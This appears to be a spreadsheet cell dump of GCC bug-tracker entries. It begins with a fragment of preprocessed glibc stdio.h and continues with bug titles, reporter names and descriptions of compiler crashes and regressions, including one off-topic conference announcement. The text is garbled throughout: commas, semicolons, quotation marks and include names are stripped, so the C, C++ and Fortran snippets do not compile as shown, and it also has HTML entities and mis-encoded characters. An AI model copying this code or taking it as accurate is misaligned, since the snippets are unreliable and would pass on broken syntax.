  return (__builtin_expect (((__fp)-&gt;_IO_read_ptr &gt;= (__fp)-&gt;_IO_read_end) 0) ? __uflow (__fp) : *(unsigned char *) (__fp)-&gt;_IO_read_ptr++)
}
extern __inline __attribute__ ((__gnu_inline__)) int
getchar_unlocked (void)
{
  return (__builtin_expect (((stdin)-&gt;_IO_read_ptr &gt;= (stdin)-&gt;_IO_read_end) 0) ? __uflow (stdin) : *(unsigned char *) (stdin)-&gt;_IO_read_ptr++)
}
extern __inline __attribute__ ((__gnu_inline__)) int
putchar (int __c)
{
  return _IO_putc (__c stdout)
}
extern __inline __attribute__ ((__gnu_inline__)) int
fputc_unlocked (int __c FILE *__stream)
{
  return (__builtin_expect (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) 0) ? __overflow (__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-&gt;_IO_write_ptr++ = (__c)))
}
extern __inline __attribute__ ((__gnu_inline__)) int
putc_unlocked (int __c FILE *__stream)
{
  return (__builtin_expect (((__stream)-&gt;_IO_write_ptr &gt;= (__stream)-&gt;_IO_write_end) 0) ? __overflow (__stream (unsigned char) (__c)) : (unsigned char) (*(__stream)-&gt;_IO_write_ptr++ = (__c)))
}
extern __inline __attribute__ ((__gnu_inline__)) int
putchar_unlocked (int __c)
{
  return (__builtin_expect (((stdout)-&gt;_IO_write_ptr &gt;= (stdout)-&gt;_IO_write_end) 0) ? __overflow (stdout (unsigned char) (__c)) : (unsigned char) (*(stdout)-&gt;_IO_write_ptr++ = (__c)))
}
extern __inline __attribute__ ((__gnu_inline__)) __ssize_t
getline (char **__lineptr size_t *__n FILE *__stream)
{
  return __getdelim (__lineptr __n '\n' __stream)
}
extern __inline __attribute__ ((__gnu_inline__)) int
feof_unlocked (FILE *__stream) throw ()
{
  return (((__stream)-&gt;_flags 
}
extern __inline __attribute__ ((__gnu_inline__)) int
ferror_unlocked (FILE *__stream) throw ()
{
  return (((__stream)-&gt;_flags 
}
# 904 /usr/include/stdio.h 2 3 4
# 1 /usr/include/bits/stdio2.h 1 3 4
# 24 /usr/include/bits/stdio2.h 3 4
extern int __sprintf_chk (char *__restrict __s int __flag size_t __slen
     __const char *__restrict __format ...) throw ()
extern int __vsprintf_chk (char *__restrict __s int __flag size_t __slen
      __const char *__restrict __format
      __gnuc_va_list __ap) throw ()
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
sprintf (char *__restrict __s __const char *__restrict __fmt ...) throw ()
{
  return __builtin___sprintf_chk (__s 2 - 1
      __builtin_object_size (__s 2 &gt; 1) __fmt __builtin_va_arg_pack ())
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
vsprintf (char *__restrict __s __const char *__restrict __fmt __gnuc_va_list __ap) throw ()
{
  return __builtin___vsprintf_chk (__s 2 - 1
       __builtin_object_size (__s 2 &gt; 1) __fmt __ap)
}
extern int __snprintf_chk (char *__restrict __s size_t __n int __flag
      size_t __slen __const char *__restrict __format
      ...) throw ()
extern int __vsnprintf_chk (char *__restrict __s size_t __n int __flag
       size_t __slen __const char *__restrict __format
       __gnuc_va_list __ap) throw ()
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
snprintf (char *__restrict __s size_t __n __const char *__restrict __fmt ...) throw ()
{
  return __builtin___snprintf_chk (__s __n 2 - 1
       __builtin_object_size (__s 2 &gt; 1) __fmt __builtin_va_arg_pack ())
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
vsnprintf (char *__restrict __s size_t __n __const char *__restrict __fmt __gnuc_va_list __ap) throw ()
{
  return __builtin___vsnprintf_chk (__s __n 2 - 1
        __builtin_object_size (__s 2 &gt; 1) __fmt __ap)
}
extern int __fprintf_chk (FILE *__restrict __stream int __flag
     __const char *__restrict __format ...)
extern int __printf_chk (int __flag __const char *__restrict __format ...)
extern int __vfprintf_chk (FILE *__restrict __stream int __flag
      __const char *__restrict __format __gnuc_va_list __ap)
extern int __vprintf_chk (int __flag __const char *__restrict __format
     __gnuc_va_list __ap)
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
fprintf (FILE *__restrict __stream __const char *__restrict __fmt ...)
{
  return __fprintf_chk (__stream 2 - 1 __fmt
   __builtin_va_arg_pack ())
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
printf (__const char *__restrict __fmt ...)
{
  return __printf_chk (2 - 1 __fmt __builtin_va_arg_pack ())
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
vprintf (__const char *__restrict __fmt __gnuc_va_list __ap)
{
  return __vfprintf_chk (stdout 2 - 1 __fmt __ap)
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
vfprintf (FILE *__restrict __stream
   __const char *__restrict __fmt __gnuc_va_list __ap)
{
  return __vfprintf_chk (__stream 2 - 1 __fmt __ap)
}
extern int __asprintf_chk (char **__restrict __ptr int __flag
      __const char *__restrict __fmt ...)
     throw () __attribute__ ((__format__ (__printf__ 3 4))) __attribute__ ((__warn_unused_result__))
extern int __vasprintf_chk (char **__restrict __ptr int __flag
       __const char *__restrict __fmt __gnuc_va_list __arg)
     throw () __attribute__ ((__format__ (__printf__ 3 0))) __attribute__ ((__warn_unused_result__))
extern int __dprintf_chk (int __fd int __flag __const char *__restrict __fmt
     ...) __attribute__ ((__format__ (__printf__ 3 4)))
extern int __vdprintf_chk (int __fd int __flag
      __const char *__restrict __fmt __gnuc_va_list __arg)
     __attribute__ ((__format__ (__printf__ 3 0)))
extern int __obstack_printf_chk (struct obstack *__restrict __obstack
     int __flag __const char *__restrict __format
     ...)
     throw () __attribute__ ((__format__ (__printf__ 3 4)))
extern int __obstack_vprintf_chk (struct obstack *__restrict __obstack
      int __flag
      __const char *__restrict __format
      __gnuc_va_list __args)
     throw () __attribute__ ((__format__ (__printf__ 3 0)))
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
asprintf (char **__restrict __ptr __const char *__restrict __fmt ...) throw ()
{
  return __asprintf_chk (__ptr 2 - 1 __fmt
    __builtin_va_arg_pack ())
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
__asprintf (char **__restrict __ptr __const char *__restrict __fmt ...) throw ()
{
  return __asprintf_chk (__ptr 2 - 1 __fmt
    __builtin_va_arg_pack ())
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
dprintf (int __fd __const char *__restrict __fmt ...)
{
  return __dprintf_chk (__fd 2 - 1 __fmt
   __builtin_va_arg_pack ())
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
obstack_printf (struct obstack *__restrict __obstack __const char *__restrict __fmt ...) throw ()
{
  return __obstack_printf_chk (__obstack 2 - 1 __fmt
          __builtin_va_arg_pack ())
}
# 195 /usr/include/bits/stdio2.h 3 4
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
vasprintf (char **__restrict __ptr __const char *__restrict __fmt __gnuc_va_list __ap) throw ()
{
  return __vasprintf_chk (__ptr 2 - 1 __fmt __ap)
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
vdprintf (int __fd __const char *__restrict __fmt __gnuc_va_list __ap)
{
  return __vdprintf_chk (__fd 2 - 1 __fmt __ap)
}
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) int
obstack_vprintf (struct obstack *__restrict __obstack __const char *__restrict __fmt __gnuc_va_list __ap) throw ()
{
  return __obstack_vprintf_chk (__obstack 2 - 1 __fmt
    __ap)
}
extern char *__gets_chk (char *__str size_t) __attribute__ ((__warn_unused_result__))
extern char *__gets_warn (char *__str) __asm__ ( gets)
     __attribute__ ((__warn_unused_result__)) __attribute__((__warning__ (please use fgets or getline instead gets can't  specify buffer size)))
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) __attribute__ ((__warn_unused_result__)) char *
gets (char *__str)
{
  if (__builtin_object_size (__str 2 &gt; 1) != (size_t) -1)
    return __gets_chk (__str __builtin_object_size (__str 2 &gt; 1))
  return __gets_warn (__str)
}
extern char *__fgets_chk (char *__restrict __s size_t __size int __n
     FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern char *__fgets_alias (char *__restrict __s int __n FILE *__restrict __stream) __asm__ ( fgets) __attribute__ ((__warn_unused_result__))
extern char *__fgets_chk_warn (char *__restrict __s size_t __size int __n FILE *__restrict __stream) __asm__ ( __fgets_chk)
     __attribute__ ((__warn_unused_result__)) __attribute__((__warning__ (fgets called with bigger size than length  of destination buffer)))
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) __attribute__ ((__warn_unused_result__)) char *
fgets (char *__restrict __s int __n FILE *__restrict __stream)
{
  if (__builtin_object_size (__s 2 &gt; 1) != (size_t) -1)
    {
      if (!__builtin_constant_p (__n) || __n &lt;= 0)
 return __fgets_chk (__s __builtin_object_size (__s 2 &gt; 1) __n __stream)
      if ((size_t) __n &gt; __builtin_object_size (__s 2 &gt; 1))
 return __fgets_chk_warn (__s __builtin_object_size (__s 2 &gt; 1) __n __stream)
    }
  return __fgets_alias (__s __n __stream)
}
extern size_t __fread_chk (void *__restrict __ptr size_t __ptrlen
      size_t __size size_t __n
      FILE *__restrict __stream) __attribute__ ((__warn_unused_result__))
extern size_t __fread_alias (void *__restrict __ptr size_t __size size_t __n FILE *__restrict __stream) __asm__ ( fread) __attribute__ ((__warn_unused_result__))
extern size_t __fread_chk_warn (void *__restrict __ptr size_t __ptrlen size_t __size size_t __n FILE *__restrict __stream) __asm__ ( __fread_chk)
     __attribute__ ((__warn_unused_result__)) __attribute__((__warning__ (fread called with bigger size * nmemb than length  of destination buffer)))
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__ __artificial__)) __attribute__ ((__warn_unused_result__)) size_t
fread (void *__restrict __ptr size_t __size size_t __n
       FILE *__restrict __stream)
{
  if (__builtin_object_size (__ptr 0) != (size_t) -1)
    {
      if (!__builtin_constant_p (__size)
   || !__builtin_constant_p (__n)
   || (__size | __n) &gt;= (((size_t) 1) &lt;&lt; (8 * sizeof (size_t) / 2)))
 return __fread_chk (__ptr __builtin_object_size (__ptr 0) __size __n __stream)
      if (__size * __n &gt; __builtin_object_size (__ptr 0))
 return __fread_chk_warn (__ptr __builtin_object_size (__ptr 0) __size __n </t>
  </si>
  <si>
    <t>neal</t>
  </si>
  <si>
    <t>GCC-45564</t>
  </si>
  <si>
    <t>gfortran.dg/achar_4.f90 ICE: verify_gimple failed: type mismatch in comparison expression with -fbounds-check</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -fbounds-check achar_4.f90 
achar_4.f90: In function 'up':
achar_4.f90:10:0: error: type mismatch in comparison expression
integer(kind=8)
integer(kind=8)
integer(kind=4)
D.1758 = D.1594 != 1
achar_4.f90:10:0: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r163921 - crash
r158095 - crash</t>
  </si>
  <si>
    <t>GCC-19005</t>
  </si>
  <si>
    <t>[3.4 regression] Error: bad register name `%sil'</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/285695]
works with 3.3 CVS 20041215 HEAD 200401212 fails with 3.4 CVS 20041215
binutils-2.15.
$ gcc -O foo.c
/tmp/cc68I7Tr.s: Assembler messages:
/tmp/cc68I7Tr.s:26: Error: bad register name `%sil'
#include 
int main( int nb char *argv[] )
{
  unsigned char a = nb b = nb + 1
  printf(a = %d - b = %d\n a b)
  a ^= b b ^= a a ^= b
  printf(a = %d - b = %d\n a b)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-78469</t>
  </si>
  <si>
    <t>[7 Regression] defaulted default constructor causes bogus requirement for accessible destructor</t>
  </si>
  <si>
    <t>Originally added as a comment on Bug 57082 and bisected to r239783:
struct no_destr {
    no_destr() = default
protected:
    ~no_destr() = default
}
int main()
{
    // error: 'no_destr::~no_destr()' is protected within this context
    new no_destr ()
}</t>
  </si>
  <si>
    <t>GCC-70043</t>
  </si>
  <si>
    <t>[6 Regression] The compiler hangs in a fortran test-case with -Ofast -g -march=haswell</t>
  </si>
  <si>
    <t>Following test-case does not finish w/ following options:
$ cat s.f90 
subroutine fn1(a b)
  real(8) intent(in) ::  b(100)
  real(8) intent(inout) :: a(100)
  real(8) c
  do i=0100
     if( a(i) &lt; 0.0 ) then
        c =  a(i) * b(i)
        a(i) = a(i) - c / b(i)
     endif
  enddo
end subroutine fn1
$ ./gcc/xgcc -Bgcc s.f90 -c -Ofast -march=haswell -g
It hangs in:
0  optimize_mask_stores (loop=0x7ffff6a4a620) at ../../gcc/tree-vect-loop.c:7079
#1  0x0000000001059005 in vectorize_loops () at ../../gcc/tree-vectorizer.c:618
#2  0x0000000000f426de in (anonymous namespace)::pass_vectorize::execute (this=0x23fbe50 fun=0x7ffff6a4bdc8) at ../../gcc/tree-ssa-loop.c:414
#3  0x0000000000cb4a6a in execute_one_pass (pass=0x23fbe50) at ../../gcc/passes.c:2336
#4  0x0000000000cb4d72 in execute_pass_list_1 (pass=0x23fbe50) at ../../gcc/passes.c:2410
#5  0x0000000000cb4da3 in execute_pass_list_1 (pass=0x23fb6c0) at ../../gcc/passes.c:2411
#6  0x0000000000cb4da3 in execute_pass_list_1 (pass=0x23fa520) at ../../gcc/passes.c:2411
#7  0x0000000000cb4dfb in execute_pass_list (fn=0x7ffff6a4bdc8 pass=0x23fa3a0) at ../../gcc/passes.c:2421
#8  0x000000000092c842 in cgraph_node::expand (this=0x7ffff68bb450) at ../../gcc/cgraphunit.c:1980
#9  0x000000000092ce78 in expand_all_functions () at ../../gcc/cgraphunit.c:2116
#10 0x000000000092d991 in symbol_table::compile (this=0x7ffff688a0a8) at ../../gcc/cgraphunit.c:2472
#11 0x000000000092dbc2 in symbol_table::finalize_compilation_unit (this=0x7ffff688a0a8) at ../../gcc/cgraphunit.c:2562
#12 0x0000000000d79ea1 in compile_file () at ../../gcc/toplev.c:490
#13 0x0000000000d7c3c1 in do_compile () at ../../gcc/toplev.c:1988
#14 0x0000000000d7c646 in toplev::main (this=0x7fffffffdae0 argc=14 argv=0x7fffffffdbe8) at ../../gcc/toplev.c:2096
#15 0x000000000072fc57 in main (argc=14 argv=0x7fffffffdbe8) at ../../gcc/main.c:39
I've already prepared a patch (pre-approved by Richi) that I've been testing.
Martin</t>
  </si>
  <si>
    <t>CLASSPATH-22580</t>
  </si>
  <si>
    <t>[4.1 Regression] 'make -j' doesn't affect source-&gt;bytecode compilation</t>
  </si>
  <si>
    <t>Since the classpath merge I have noticed that the source-&gt;bytecode stage of the
libgcj build is not being paralellized.
This warning was also seen:
make[4]: Entering directory
`/home/mckinlay/cvs/gcc/build-x86_64/x86_64-unknown-linux-gnu/libjava/classpath/lib
make[4]: warning: jobserver unavailable: using -j1.  Add `+' to parent make rule.</t>
  </si>
  <si>
    <t>GCC-47013</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/sms-*.c scan-rtl-dump-times sms SMS succeeded *</t>
  </si>
  <si>
    <t>I believed that a PR has been opened for this failures but I cannot find any. Since over a year (see
http://gcc.gnu.org/ml/gcc-testresults/2009-12/msg02672.html to
http://gcc.gnu.org/ml/gcc-testresults/2010-12/msg01632.html ) The following tests
FAIL: gcc.dg/sms-2.c scan-rtl-dump-times sms SMS succeeded 1
FAIL: gcc.dg/sms-4.c scan-rtl-dump-times sms SMS succeeded 1
FAIL: gcc.dg/sms-5.c scan-rtl-dump-times sms SMS succeeded 1
FAIL: gcc.dg/sms-6.c scan-rtl-dump-times sms SMS succeeded 3
FAIL: gcc.dg/sms-7.c scan-rtl-dump-times sms SMS succeeded 3
FAIL: gcc.dg/sms-8.c scan-rtl-dump-times sms SMS succeeded 1
fail on powerpc*-*-* for both -m32 and -m64. In addition on powerpc-apple-darwin9
FAIL: gcc.dg/sms-3.c scan-rtl-dump-times sms SMS succeeded 1
also fails with -m32. The dumps for sms-2.c are
[karma] f90/bug% less sms-2.c.180r.sms 
 Function fun (fun)
(note 1 0 4 NOTE_INSN_DELETED)
(note 4 1 3 2 [bb 2] NOTE_INSN_BASIC_BLOCK)
(note 3 4 0 2 NOTE_INSN_FUNCTION_BEG)
try_optimize_cfg iteration 1
 1 loops found
 Loop 0
  header 0 latch 1
  depth 0 outer -1
  nodes: 0 1 2
 2 succs { 1 }
Reordered sequence:
 2 compensation  [10000]
(note 1 0 4 NOTE_INSN_DELETED)
(note 4 1 3 2 [bb 2] NOTE_INSN_BASIC_BLOCK)
(note 3 4 0 2 NOTE_INSN_FUNCTION_BEG)
starting the processing of deferred insns
ending the processing of deferred insns
[karma] f90/bug% less sms-2.c.189r.sms
 Function fun (fun)
(note 1 0 4 NOTE_INSN_DELETED)
(note 4 1 3 2 [bb 2] NOTE_INSN_BASIC_BLOCK)
(note 3 4 0 2 NOTE_INSN_FUNCTION_BEG)
try_optimize_cfg iteration 1
 1 loops found
 Loop 0
  header 0 latch 1
  depth 0 outer -1
  nodes: 0 1 2
 2 succs { 1 }
Reordered sequence:
 2 compensation  [10000]
(note 1 0 4 NOTE_INSN_DELETED)
(note 4 1 3 2 [bb 2] NOTE_INSN_BASIC_BLOCK)
(note 3 4 0 2 NOTE_INSN_FUNCTION_BEG)
starting the processing of deferred insns
ending the processing of deferred insns</t>
  </si>
  <si>
    <t>GCC-21527</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2/4.3 Regression] BYTEmark bitmap test: Regression with Profiled Optimization</t>
  </si>
  <si>
    <t>Another follow-on bug similar to bug 21485.  The profiled optimizer on both
3.4.3 and 4.0.0 makes code worse than without it.  Run times go up by 50% or more.
Relevant flags are: -static -O3 -march=athlon-xp -fomit-frame-pointer
This runs a fixed number of iterations time from the command line to compare.
This is probably an interesting bug on its own or at least I hope so.  However
what I originally discovered with the real BYTEmark code was that 3.4.3's
profiled optimizer made the code better but 4.0.0's made it worse.  Somehow in
the process of combining things into one file and removing redundant code
3.4.3's profiled optimizer started pessimizing the code as well.  Let me know if
I should attempt to reproduce that behavior again (though I might not be able to
come up with the single-preprocessed-file testcase for that).</t>
  </si>
  <si>
    <t>jbucata</t>
  </si>
  <si>
    <t>GCC-19268</t>
  </si>
  <si>
    <t>GCC 3.3/Irix 6.5 union as vararg not passed correctly</t>
  </si>
  <si>
    <t xml:space="preserve">
	The code below passes a union (type ct1) as a var arg. The callee checks 
	that the union is indeed received correctly by checking each field. This 
	fails in line 38:
	    assert (hv1.bv1 ==  nv1.bv1)
Environment:
System: IRIX64 mars 6.5 07080049 IP27
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: ../configure --prefix=/usr/freeware --enable-version-specific-runtime-libs --disable-shared --enable-threads --enable-haifa --enable-libgcj --disable-c-mbchar
How-To-Repeat:
	Compile and run the following code. The bug manifests itself with
	the following message:
	Assertion failed: EX file foo.c line 38</t>
  </si>
  <si>
    <t>chli002</t>
  </si>
  <si>
    <t>GCC-51775</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gnat.dg/pack9.adb scan-tree-dump-not optimized gnat_rcheck</t>
  </si>
  <si>
    <t>The test gnat.dg/pack9.adb has started to fail in 64 bit mode between revisions 182179 (OK) and 182258:
[karma] f90/bug% grep gnat_rcheck pack9.adb.149t.optimized
  .gnat_rcheck_21 (pack9.adb 11)</t>
  </si>
  <si>
    <t>GCC-79430</t>
  </si>
  <si>
    <t>[8 Regression] action of statement incorrectly optimised away</t>
  </si>
  <si>
    <t>Unfortunately this is only in a very large test case at the moment which needs both gfortran and OCaml using: 
http://whizard.hepforge.org/versions/unofficial/whizard-2.4.1_alpha-20170131.tar.gz
and configuring with ./configure --with-precision=extended
Then make and make check. In the test suite the functional test mlm_matching_isr
will show a discrepancy coming from the fact that in the function integral_over_z_isr 
in shower_core.f90 the if clause after 'call integral_over_z_part_isr' namely
if (integral &gt; final) then
  return
end if 
is not correctly executed either optimised away or scrambled. 
Funnily this happens only if the default precision for real types is set to extended precision for double and quadruple precision it works as in previous gfortran versions. 
The attempt to reduce this case made this behaviour disappear.</t>
  </si>
  <si>
    <t>juergen.reuter</t>
  </si>
  <si>
    <t>GCC-7217</t>
  </si>
  <si>
    <t>Building a i686-&gt;sparc cross-compiler is a no go.</t>
  </si>
  <si>
    <t>bootstrap appears to proceed normally until it comes to compiling gcc/crtstuff.c when a few pagefuls of assembler errors emerge.
I suspect that xgcc may be using the wrong assembler at this point but I am not sufficiently versed in the differences between GNU Sparc ASM and GNU i386 ASM to be able to tell from the errors.
The error messages are attached.
Please advise me of an alternative way to build a cross-compiler if possible as I have a fairly urgent need for one at the moment.
Release:
gcc-core 3.1
Environment:
SuSE Linux 7.2 (kernel 2.4.4 gcc 2.95.3 binutils 2.10.91 glibc 2.2.2 make 3.79.1 bash 2.05.0(1))
How-To-Repeat:
Download and unpack gcc-core-3.1. Download and unpack binutils-2.12.1.
cd gcc-3.1
ln -s ../binutils-2.12 binutils
 ./configure --target=sparc-linux --enable-shared --with-languages=c --with-cross-host=i686-pc-linux-gnu --host=i686-pc-linux-gnu --build=i686-pc-linux-gnu
make bootstrap (or just make)</t>
  </si>
  <si>
    <t>pwilloug</t>
  </si>
  <si>
    <t>GCC-77905</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE at -Os and above in both 32-bit and 64-bit modes on x86_64-linux-gnu (internal compiler error: in ipa_comdats at ipa-comdats.c:352)</t>
  </si>
  <si>
    <t>$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1008 (experimental) [trunk revision 240893] (GCC) 
$ 
$ gcc-trunk -c -O2 small.C
small.C:17:19: internal compiler error: in ipa_comdats at ipa-comdats.c:352
 C::C(int) : A(1) {}
                   ^
0x15145eb ipa_comdats
        ../../gcc-source-trunk/gcc/ipa-comdats.c:352
0x15145eb execute
        ../../gcc-source-trunk/gcc/ipa-comdats.c:412
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
$ cat small.C
struct A {
  A(int)
}
struct B : A {
  B()
} A
struct C : virtual A {
  C(int)
}
A::A(int p1) {
  if (p1)
    A(0)
}
B::B() : A(1) {}
C::C(int) : A(1) {}
$</t>
  </si>
  <si>
    <t>GCC-30476</t>
  </si>
  <si>
    <t>[Regression 4.2 4.3] Via other module imported generic interface rejected</t>
  </si>
  <si>
    <t>(Based on Andrea Ferretti http://gcc.gnu.org/ml/fortran/2007-01/msg00368.html)
The following valid program is rejected with the following message:
  USE global_module
                  1
Error: Name 'hello' at (1) is an ambiguous reference to 'hello' from module 'interfaces'
  CALL hello(10)
               1
Error: There is no specific subroutine for the generic 'hello' at (1)
 * * *
SUBROUTINE hello_x(dum)
   IMPLICIT NONE
   INTEGER :: dum
   WRITE(0*) Hello world:  dum
END SUBROUTINE hello_x
MODULE interfaces
IMPLICIT NONE
INTERFACE hello
   SUBROUTINE hello_x(dum)
      IMPLICIT NONE
      INTEGER :: dum
   END SUBROUTINE hello_x
END INTERFACE
END MODULE interfaces
MODULE global_module
  USE interfaces
END MODULE global_module
PROGRAM main
  USE global_module
  IMPLICIT NONE
  CALL hello(10)
END PROGRAM main</t>
  </si>
  <si>
    <t>GCC-41866</t>
  </si>
  <si>
    <t>Wrong standard in docs for ISO_FORTRAN_ENV</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/onlinedocs/gfortran/ISO_005fFORTRAN_005fENV.html
lists ISO_FORTRAN_ENV. The standard is marked as Fortran 2003 but INT{81632} and REAL{3264128} are Fortran 2008</t>
  </si>
  <si>
    <t>GCC-8651</t>
  </si>
  <si>
    <t>II Congreso Internacional de TelemÃ¡tica CITEL 2002</t>
  </si>
  <si>
    <t xml:space="preserve"> Este mensaje se ha escrito en Ingles y en EspaÃ±ol
 This message has two versions . An English version and a Spansih version.
 (VersiÃ³n en EspaÃ±ol)
 Con motivo de la proximidad del evento ya esta disponible en el Sitio Oficial del Congreso CITEL 2002  el programa de actividades.
 Para consultarlo utilice la direcciÃ³n (http://www.ispjae.edu.cu/eventos/citel/programa.htm).
 (English version)
 Keeping in mind the proximity of the event it is already available in the Official Web Site of CITEL 2002 the activities program.  
 Consult it in the following address (http://www.ispjae.edu.cu/eventos/citel/programa.htm).
 Marlon MuÃ±oz Miranda 
 Coordinador para Europa
 E-mail: europa@citel.ispjae.edu.cu
 URL: http://www.ispjae.cu/eventos/citel
Release:
unknown</t>
  </si>
  <si>
    <t>europa</t>
  </si>
  <si>
    <t>GCC-33333</t>
  </si>
  <si>
    <t>ICE with #pragma omp parallel for in try/catch statement</t>
  </si>
  <si>
    <t>Overview
=========
When compiling the simple file which is attached to this report I get the following message suggesting that I report it here:
compiler_error.cc:18: internal compiler error: in lower_regimplify at omp-low.c:4251
Steps to reproduce
====================
Compile the attached file compiler_error.cc:
g++-4.2.1 -c -Wall -fopenmp -save-temps -o compiler_error.o compiler_error.cc
Build Date &amp; Platform
=====================
Red Hat Enterprise Linux AS release 4 (Nahant Update 5)
Linux 2.6.19.2 #8 SMP Mon Jun 25 2007 x86_64 GNU/Linux
gcc was configured with: .../gcc-4.2.1/configure --prefix=.../gcc-4.2.1 --program-suffix=-4.2.1 --enable-threads --enable-languages=c++fortran
The bug shows up both with the RedHat gcc version AND the official version.
The bug does not occur when I compile the source using the portland compiler for example.
Additional Information
======================
1. When I remove the try...catch statement the problem is gone.
2. When I do not loop up to the class variable A::x but a constant (say 1000) the problem is gone.</t>
  </si>
  <si>
    <t>GCC-25951</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] Problem with LOC intrinsic for assumed size arrays</t>
  </si>
  <si>
    <t>Compiling the following code results in a compile error:
PROGRAM loc_1
CONTAINS
   SUBROUTINE f (x)
      INTEGER DIMENSION(*)   :: x
      INTEGER                 :: address
      address=LOC(x)
   END SUBROUTINE f
END PROGRAM loc_1
The error produced by gfortran is:
[aardschokker:fms/trunk/obj] mark% /usr/local/bin/gfortran -c loc_1.f90
 In file loc_1.f90:6
      address=LOC(x)
                 1
Error: The upper bound in the last dimension must appear in the reference to the assumed size array 'x' at (1)
This code has been compiled with
[aardschokker:fms/trunk/obj] mark% /usr/local/bin/gfortran -v
Using built-in specs.
Target: powerpc-apple-darwin7.9.0
Configured with: /storage/usr/src/gcc/configure --prefix=/usr/local --disable-libmudflap --enable-altivec --enable-languages=cfortran --with-gmp=/sw --with-mpfr=/sw
Thread model: posix
gcc version 4.2.0 20060121 (experimental)</t>
  </si>
  <si>
    <t>mhesseli</t>
  </si>
  <si>
    <t>GCC-9849</t>
  </si>
  <si>
    <t>Missing keyword 'template' produces ICE with no diagnostic on 3.3 (and unreadable diagnostic on 3.4)</t>
  </si>
  <si>
    <t>The following code produces the error:
test.cc:8: sorry not implemented: `tree_vec' not supported by dump_expr
which isn't very helpful -- the problem is in fact a missing template keyword before C2.
template struct C1
{
  template struct C2
  { class Type { } }
}
template
void foo(typename C1::C2::Type *) { }
Release:
unknown
Environment:
Debian (unstable) locally-compiled gcc 3.2.1</t>
  </si>
  <si>
    <t>zak.kipling</t>
  </si>
  <si>
    <t>GCC-981</t>
  </si>
  <si>
    <t>g++: missing semicolon causes ice in cp_finish_decl:8218</t>
  </si>
  <si>
    <t>The following simple code crashes the compiler with an internal
compiler error. The code is buggy a semicolon is missing at line 12.
The compiler cc1plus crashes at line 8218 of the file
gcc-20001127/gcc/cp/decl.c which reads 
	  if (doing_semantic_analysis_p ())
	    maybe_inject_for_scope_var (decl).
Release:
2.97 20001127 (experimental)
Environment:
System: Linux kiste 2.4.0-test11 #21 Thu Nov 30 00:18:12 CET 2000 i686 unknown
Architecture: i686
GNU assembler 001002
GLIBC 2.1.3
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-20001127/configure -enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-libstdcxx-v3
How-To-Repeat:
source file tadt1.C:
template
class A
{}
template
class B {
public:
  static int f()
}
template 
void g(A &amp;a)   //error semicolon is missing
template 
void h(A 
int main()
{
}
template
int B::f(){}
template
void h(A &amp;a int d)
{
  void *b =     
  int c = sizeof(T)       
}
Compiling the programm tadt1.C:
g++ -Q -v tadt1.C -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc-20001127/configure -enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-libstdcxx-v3
gcc version 2.97 20001127 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c++ -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tadt1.C tadt1.ii
GNU CPP version 2.97 20001127 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
